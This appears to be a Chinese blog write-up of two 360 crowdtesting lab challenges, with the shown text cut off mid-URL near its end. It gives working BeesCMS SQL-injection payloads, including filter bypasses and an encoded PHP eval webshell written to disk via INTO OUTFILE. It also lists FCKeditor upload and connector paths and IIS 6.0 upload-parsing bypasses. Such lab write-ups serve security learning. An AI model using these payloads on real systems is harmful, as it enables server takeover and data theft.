最近360众测很火,听说好多这上面的题,抽空做做!

Web安全

CMS漏洞

BeesCMS系统漏洞分析溯源

御剑扫目录:

发现后台/admin/login.php,此处存在sql注入

详细分析参见:https://www.cnblogs.com/yuzly/p/11423384.html

此处验证码存在漏洞,即一个验证码可多次使用,我们在username处加上一个'发现

sql语句也出来了

1
select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='dsad'' limit 0,1

漏洞分析可知,union, and,select被替换,可以这样绕过:

1
2
3
union => uni union on
select => selselectect
and => a and nd

user输入,发现成功报错注入

1
admin ' a and nd extractvalue(1,concat(1,database()))%23

试着写shell,这里有htmlspecialchars函数的过滤,16进制或者char函数绕过,url编码好像绕过不了,还有对into ,outfile的过滤,可以这样绕过

1
2
outfile => outoutfilefile
into => in into

最终构造payload:

1
admin' uni union on selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e  in into  outoutfilefile %27/var/www/html/moonback.php%27%23

或者

1
admin' uni union on selselectect null,null,null,null,CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 49, 93, 41, 59, 63, 62)  in into  outoutfilefile %27/var/www/html/mb.php%27%23

密码为1,蚁剑连在/key.txt发现key

编辑器漏洞

编辑器漏洞分析溯源(第1题)

参考:https://www.secpulse.com/archives/116338.html

访问靶场,提示编辑器在/fckeditor/目录

查看一下编辑器版本信息

1
2
/fckeditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html

测试上传点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

随便输一个不存在的路径发现是IIS的报错页面,在

1
fckeditor/editor/filemanager/connectors/test.html

发现可以上传

在http 响应头里看到有Microsoft-IIS/6.0,绕过方法很多,这里不需要绕过好像

1. 二次上传绕过

文件名‘ . ’ 修改为‘ _ ’

FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名文件,文件名会变为shell.asp;(1).jpg

2. 提交shell.php+空格绕过

提交shell.php+空格绕过

空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。

3. iis6.0突破文件夹限制

1
2
3
4
5
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

4. 文件解析限制

通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。

1
http://www.moonback.xyz/images/upload/201806/image/1.asp/1.jpg

关于解析漏洞参考:https://www.secpulse.com/archives/3750.html

最终上传类似shell.asp;jpg就能上传成功,成功之后会把目录文件列举出来,地址:

1
/userfiles/file/shell.asp;jpg

蚁剑连找flag就行

如果找不到目录的话可以试试

1. 根据xml返回信息查看网站目录

1
http://www.-sec.org/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

2. 获取当前文件夹

1
2
3
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

3. 游览c盘

1
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&Curre

11

评论